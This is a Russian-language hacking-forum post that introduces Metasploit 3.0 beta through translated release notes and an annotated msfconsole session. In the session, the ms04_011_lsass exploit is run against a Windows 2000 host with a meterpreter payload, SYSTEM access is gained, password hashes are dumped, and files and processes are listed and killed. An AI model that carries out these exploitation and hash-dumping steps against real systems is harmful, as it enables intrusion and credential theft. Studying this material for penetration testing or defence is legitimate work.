1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Что такое метасплоит:)

Тема в разделе "Чужие", создана пользователем }{OTT@BY4, 20 окт 2012.

  1. TopicStarter Overlay
    }{OTT@BY4

    }{OTT@BY4 Гость

    Многие задают вопрос, а что такое этот хвалёный метасплоит, я решил выложить краткое описания данной тулзы:)
    Меtasploit Framework 3.0

    Предисловие:
    Прежде чем приступать к чтению статьи, для более глубокого понимания рекомендую ознакомиться с моими статьями по данному пакету
    Please login or register to view links
    Please login or register to view links
    Статья ИМХО не расчитана на новичков, а предназначена для тех кто достаточно хорошо владеет навыками пользования пакетом и обладает определённым багажом знаний по вопросом эксплуатации уязвимостей...

    1
    Цитата:
    Мы счастливы объявить, что первый beta 3.0 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.0 1 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.

    Некоторые фишки по сравнению с версией 2.6:
    - Все модули организованы в каталоге heirarchy
    - Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
    - Новые особенности Meterpreter значительно помогают с испытанием проникновения
    - Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
    - Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
    - Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
    - Поддержка для последних багов браузеров :)

    Этот выпуск может быть скачан с официального web-сайта Metasploit отсюда

    Пользователи Unix, нуждаются в установке openssl и zlib модулей Руби (Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
    Если Вы используете Ubuntu, выполните следующие команды:
    # apt-get install libzlib-ruby
    # apt-get install libopenssl-ruby

    Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от Please login or register to view links и собрать его из исходника.

    Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)

    Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).

    Быстрая демонстрация использования msfconsole с meterpreter:

    ____________
    <metasploit>
    ------------
    \, __,
    \ (oo) ____
    (__)) || - || *


    = [msf v3.0-beta-1
    =[ msf v3.0-beta-1
    + -- --=[ 86 exploits - 90 payloads....................[86 эксплоитов - 90 начинок (полезных грузов)
    + -- --=[ 16 encoders - 4 nops ........................[16 кодеров - 4 только для указанных целей (неуверен в переводе)
    = [4 aux

    msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
    msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
    RHOST => 192.168.0.106
    msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит
    [*] Started bind handler.. .................................... стартует связанный обработчик
    [*] Getting OS information... .................................... Получаем информацию об операционной системе
    [*] Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000
    [*] Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)
    [*] Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)
    [*] Sleeping before handling stage... ................................... Бездействие перед обработкой стадии
    [*] Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...
    [*] Upload completed. .................................................. . Загрузка завершена.
    [*] Meterpreter session 1 opened (192.168.0.145:41829 ->
    192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)
    [*] The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
    Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
    meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
    Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
    meterpreter > use priv .................................................. используем priv
    Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
    meterpreter > hashdump .................................................. Дампим хэш
    Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
    meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
    Listing: c: .................................................. ........... Листинг С:
    ============

    Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
    ---- ---- ---- ------------- ----
    100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
    100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
    40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
    40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
    100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
    100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
    [ snip ]

    meterpreter > ps .................................................. ....... смотрим процессы

    Process list
    ============

    PID Name Path
    --- ---- ----
    176 smss.exe \SystemRoot\System32\smss.exe
    200 csrss.exe \??\C:\WINNT\system32\csrss.exe
    224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
    252 services.exe C:\WINNT\system32\services.exe
    264 lsass.exe C:\WINNT\system32\lsass.exe
    440 svchost.exe C:\WINNT\system32\svchost.exe
    [ snip ] .................................................. ................ надрез
    1804 wins.exe C:\WINNT\System32\wins.exe
    2676 logon.scr C:\WINNT\system32\logon.scr

    meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
    Killing: 2676 .................................................. ........... убивается ;-)
     
    • Like Like x 2
    Метки:

Поделиться этой страницей

Загрузка...